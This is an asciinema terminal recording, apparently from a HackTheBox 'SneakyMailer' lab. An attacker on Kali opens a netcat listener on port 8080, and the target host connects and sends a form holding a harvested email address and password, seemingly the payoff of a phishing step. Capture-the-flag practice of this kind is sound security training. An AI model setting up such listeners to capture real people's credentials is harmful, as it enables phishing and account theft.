{"version": 2, "width": 85, "height": 20, "timestamp": 1607092644, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.025821, "o", "\u001b]0;kali@kali: ~\u0007\u001b[1;34mkali@kali\u001b[00m:\u001b[1;32m~\u001b[00m$ "]
[0.420354, "o", "n"]
[0.504616, "o", "c"]
[0.612864, "o", " "]
[0.69998, "o", "-"]
[0.892111, "o", "l"]
[0.980384, "o", "v"]
[1.130689, "o", "n"]
[1.234532, "o", "p"]
[1.332264, "o", " "]
[1.795882, "o", "8"]
[2.059796, "o", "0"]
[2.251807, "o", "8"]
[2.346489, "o", "0"]
[2.600919, "o", "\r\n"]
[2.602338, "o", "listening on [any] 8080 ...\r\n"]
[4.229194, "o", "connect to [10.10.14.63] from (UNKNOWN) [10.10.10.197] 54540\r\nPOST / HTTP/1.1\r\r\nHost: 10.10.14.63:8080\r\r\nUser-Agent: python-requests/2.23.0\r\r\nAccept-Encoding: gzip, deflate\r\r\nAccept: */*\r\r\nConnection: keep-alive\r\r\nContent-Length: 185\r\r\nContent-Type: application/x-www-form-urlencoded\r\r\n\r\r\nfirstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt"]
